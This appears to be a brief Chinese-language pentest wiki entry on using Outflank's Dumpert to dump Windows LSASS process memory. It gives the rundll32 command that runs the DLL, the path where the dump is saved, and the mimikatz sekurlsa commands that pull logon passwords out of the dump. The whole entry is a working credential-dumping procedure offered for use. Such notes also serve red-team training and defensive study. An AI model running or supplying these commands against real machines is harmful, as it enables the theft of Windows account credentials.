Dumpert

https://github.com/outflanknl/Dumpert
有三种,分别是dll,可执行文件和cs的Aggressor插件,这里测试下dll和exe
DLL的执行方式是
rundll32.exe C:\Outflank-Dumpert.dll,Dump
文件保存在c:\windows\temp\dumpert.dmp
用mimikatz
>sekurlsa::mimidump c:\windows\temp\dumpert.dmp
>sekurlsa::logonpasswords
可执行文件就直接执行就可以了

最后更新于